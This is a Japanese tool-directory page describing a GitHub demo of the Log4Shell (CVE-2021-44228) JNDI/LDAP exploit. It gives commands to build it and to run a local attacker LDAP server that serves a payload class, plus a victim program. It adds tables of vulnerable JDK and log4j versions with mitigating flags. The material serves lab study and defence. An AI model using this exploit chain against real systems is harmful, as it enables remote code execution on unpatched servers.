Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
sample-ldap-exploit — CVE-2021-44228 の短いデモ | Kitploit
ツール/GitHubGitHub/phoswald/sample-ldap-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ペイロード開発ラボと実践Archived
GitHubphoswald/sample-ldap-exploit

sample-ldap-exploit

CVE-2021-44228 の短いデモ

リポジトリを見る
5214年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

sample-ldap-exploit

CVE-2021-44228 の簡単なデモです。

ビルド

root@kitploit:~
$ mvn clean verify

攻撃者の実行

root@kitploit:~
$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar

URL:

  • http://localhost:8080/
  • http://localhost:8080/sample/payload/Payload.class

被害者の実行

root@kitploit:~
$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim

結果

JDK / JRE

バージョンステータス
Oracle JDK 8u5脆弱性あり
OpenJDK 8u312脆弱性なし(-Dcom.sun.jndi.ldap.object.trustURLCodebase=true の場合を除く)
IBM OpenJDK 8u312-b07 (OpenJ9)脆弱性なし(-Dcom.sun.jndi.ldap.object.trustURLCodebase=true の場合を除く)
OpenJDK 11.0.7+10脆弱性なし(-Dcom.sun.jndi.ldap.object.trustURLCodebase=true の場合を除く)
OpenJDK 11.0.13+8脆弱性なし(-Dcom.sun.jndi.ldap.object.trustURLCodebase=true の場合を除く)
OpenJDK 16+36脆弱性なし(-Dcom.sun.jndi.ldap.object.trustURLCodebase=true の場合を除く)
OpenJDK 17+35脆弱性なし(-Dcom.sun.jndi.ldap.object.trustURLCodebase=true の場合を除く)
OpenJDK 17.0.1+12脆弱性なし(-Dcom.sun.jndi.ldap.object.trustURLCodebase=true の場合を除く)

脆弱性がない場合、javax.naming.Context.lookup() から javax.naming.Reference のインスタンスが返されます。

リモートのコードベースからのクラス読み込みに対して脆弱でない場合でも、他の Java の逆シリアル化の脆弱性がまだ存在する可能性があります!

log4j

バージョンステータス
2.9.1脆弱性あり
2.10.0脆弱性あり(-Dlog4j2.formatMsgNoLookups=true または環境変数 LOG4J_FORMAT_MSG_NO_LOOKUPS=true の場合を除く)
2.14.1脆弱性あり(-Dlog4j2.formatMsgNoLookups=true または環境変数 LOG4J_FORMAT_MSG_NO_LOOKUPS=true の場合を除く)
2.15.0脆弱性なし

脆弱性がない場合、${jndi:ldap:...} は解決されません。

ツールをダウンロード